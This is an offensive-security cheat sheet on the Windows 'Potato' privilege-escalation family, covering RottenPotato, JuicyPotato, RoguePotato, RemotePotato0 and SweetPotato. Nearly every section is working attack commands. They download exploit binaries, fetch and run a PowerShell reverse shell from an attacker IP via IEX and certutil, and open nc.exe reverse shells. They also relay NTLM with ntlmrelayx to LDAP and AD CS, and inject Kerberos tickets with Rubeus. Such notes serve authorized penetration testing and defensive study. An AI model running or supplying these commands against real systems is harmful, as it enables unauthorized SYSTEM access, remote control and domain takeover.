# Potatoes

* <https://jlajara.gitlab.io/others/2020/11/22/Potatoes_Windows_Privesc.html>
* <https://hideandsec.sh/books/windows-sNL/page/in-the-potato-family-i-want-them-all>

## RottenPotato

* <https://foxglovesecurity.com/2016/09/26/rotten-potato-privilege-escalation-from-service-accounts-to-system/>
* <https://github.com/foxglovesec/RottenPotato>

```
$ curl -L https://github.com/foxglovesec/RottenPotato/raw/master/rottenpotato.exe > r.exe
meterpreter > upload r.exe
meterpreter > load incognito
meterpreter > execute -cH -f r.exe
meterpreter > list_tokens -u
meterpreter > impersonate_token "NT AUTHORITY\\SYSTEM"
```

## LonelyPotato

* <https://decoder.cloud/2017/12/23/the-lonely-potato/>
* <https://github.com/decoder-it/lonelypotato>

## JuicyPotato

* <https://ohpe.it/juicy-potato/>
* <https://ohpe.it/juicy-potato/CLSID/>
* <https://github.com/ohpe/juicy-potato/releases>
* <https://github.com/ivanitlearning/Juicy-Potato-x86/releases>

```
$ curl -L https://github.com/ohpe/juicy-potato/releases/download/v0.1/JuicyPotato.exe > j.exe
...Using pwsh reverse shell...
$ curl -L https://github.com/samratashok/nishang/raw/master/Shells/Invoke-PowerShellTcpOneLine.ps1 > rev.ps1
Cmd > certutil -urlcache -split -f http://10.10.13.37/j.exe C:\Windows\System32\spool\drivers\color\j.exe
Cmd > echo cmd /c powershell -exec bypass -nop -c "IEX(New-Object Net.WebClient).DownloadString('http://10.10.13.37/rev.ps1')" > rev.bat
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\rev.bat
...Using nc.exe...
Cmd > .\j.exe -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820} -l 1337 -p C:\Windows\System32\spool\drivers\color\nc.exe "10.10.13.37 1337 -e cmd"
```

## RoguePotato

* <https://decoder.cloud/2020/05/11/no-more-juicypotato-old-story-welcome-roguepotato/>
* <https://github.com/antonioCoco/RoguePotato/releases>

Redirect traffic that comes to 135 port on Attacker (`10.10.13.37`) with `socat` back to the Victim (`192.168.1.11`) on port 9999 (RogueOxidResolver is running locally on port 9999 on Victim):

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9999
```

Trigger the potato to run a binary with high privileges (don't forget to start a listener if sending a reverse shell):

```
Cmd > .\RoguePotato.exe -r 10.10.13.37 -e "C:\windows\Temp\nc.exe 10.10.13.37 443 -e cmd" -l 9999
```

## RemotePotato0

* <https://www.sentinelone.com/labs/relaying-potatoes-another-unexpected-privilege-escalation-vulnerability-in-windows-rpc-protocol/>
* <https://github.com/antonioCoco/RemotePotato0/releases>

Get session ID of the user to pwn:

```
Cmd > query user
Cmd > quser
```

Hashes collector (modes 2, 3):

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
Cmd > .\RemotePotato0.exe -m 2 -x 10.10.13.37 -p 9998 -s 5
```

Cross-protocol relay (modes 0, 1):

```
$ sudo socat -v TCP-LISTEN:135,fork,reuseaddr TCP:192.168.1.11:9998
$ ntlmrelayx.py -t ldap://192.168.1.11 --escalate-user snovvcrash --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5
```

[Combining](https://twitter.com/0xcsandker/status/1430111652008112131) with ESC8:

```
$ ntlmrelayx.py -t http://CA01.megacorp.local/certsrv/certfnsh.asp --adcs --template User --no-smb-server --no-wcf-server --no-raw-server
Cmd > .\RemotePotato0.exe -m 0 -r 10.10.13.37 -x 10.10.13.37 -p 9998 -s 5 -c "{f8842f8e-dafe-4b37-9d38-4e0714a61149}"
Cmd > .\Rubeus.exe asktgt /user:snovvcrash /domain:megacorp.local /dc:DC1.megacorp.local /certificate:<BASE64_PFX_CERT> /ptt
```

## GenericPotato

* <https://micahvandeusen.com/the-power-of-seimpersonation/>
* <https://github.com/micahvandeusen/GenericPotato>

## EfsPotato

* <https://github.com/zcgonvh/EfsPotato>

## Tools

### SweetPotato

* <https://github.com/CCob/SweetPotato>

```
Cmd > .\SweetPotato.exe -p C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -a "-w hidden -enc <BASE64_CMD>"
```

### MultiPotato

* <https://github.com/S3cur3Th1sSh1t/MultiPotato>